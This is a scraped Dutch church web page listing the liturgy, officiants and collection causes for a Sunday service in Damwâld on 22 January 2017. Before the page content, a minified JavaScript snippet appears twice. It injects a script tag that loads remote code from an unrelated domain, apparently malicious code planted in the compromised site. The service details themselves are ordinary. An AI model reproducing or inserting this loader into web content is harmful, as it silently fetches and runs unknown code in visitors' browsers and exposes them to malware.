;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 22 januari 2017 9:30 uur - PKN Damwâld
zondag 22 januari 2017
09:30 uur
Viering Heilig Avondmaal

Kerkdienst zondag 22 januari 2017 9:30 uur

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Ivo van Hijum
Mededeling:Viering Heilig Avondmaal
Liturgie
lied voor de dienst Psalm 91: 1 en 7
Woord van welkom
Intochtslied ELB 58: 1, 2 en 3
Stil gebed, bemoediging en groet
We zingen: Gezang 172: 1, 2 en 3
Apostolische Geloofsbelijdenis
We zingen: Gezang 172: 4
Gebed
We lezen: Mattheus 4: 1-11
Collecte
We zingen: Psalm 116: 1, 2, 3 en 4
Verkondiging
We zingen: Psalm 116: 5, 6, 7 en 8
Avondmaal formulier
Afsluiting van de week van voorbereiding: 4 vragen
Lezing van het Avondmaal formulier ‘doe dit tot Mijn gedachtenis’

Gebed
We zingen: Gezang 360: 1 en 2
Viering van het avondmaal
Dankgebed
Slotlied ELB 79: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting Children's Relief

Children's Relief zet zich in om in woord en daad de situatie van kinderen in achterstandssituaties in Oost-Europa te verbeteren. Zij verkondigt Gods Woord, stimuleert de kinderen in hun ontwikkeling en helpt hen een zelfstandig leven op te bouwen. Zij begeleidt mensen die zich voor een lange termijn inzetten en organiseert werkvakanties. Stichting Children's Relief is verbonden met Stichting OostEuropa Zending.

Tweede collecte: Kerk
Uitganscollecte: Noodhulp voor Haïti

Haïti is op dinsdag 4 oktober 2016 getroffen door een zware orkaan, een humanitaire ramp voor het arme land dat nog altijd worstelt met de gevolgen van de zware aardbeving in 2010. Na de aardbeving, die vooral in de hoofdstad Port-au Prince en omgeving veel slachtoffers maakte en ervoor zorgde dat miljoenen mensen dakloos werden, heeft de orkaan nu met name grote schade aangericht ten westen van Port-au-Prince. De beelden die onze partnerorganisaties sturen tonen zwaar beschadigde huizen en rivieren die buiten hun oevers zijn getreden. We ontvangen berichten over honderden doden en tienduizenden daklozen. Dat de gevolgen van de orkaan het land weer jaren achterop brengen lijkt zeker. ICCO en Kerk in Actie zijn jarenlang zeer actief geweest in Haïti, zeker direct na de aardbeving van 2010 en in de jaren dat ons wederopbouwprogramma liep. Via het ACT netwerk zijn we nog altijd nauw betrokken bij onze partners. Zij waren voor de orkaan al actief bezig mensen uit voorzorg te evacueren, en verlenen nu noodhulp ter plekke. ICCO en Kerk in Actie hebben 50.000 euro beschikbaar gesteld voor deze eerste noodhulp verlening en hebben 50.000 euro toegezegd gekregen van EO-Metterdaad. Maar er is nog veel meer geld nodig!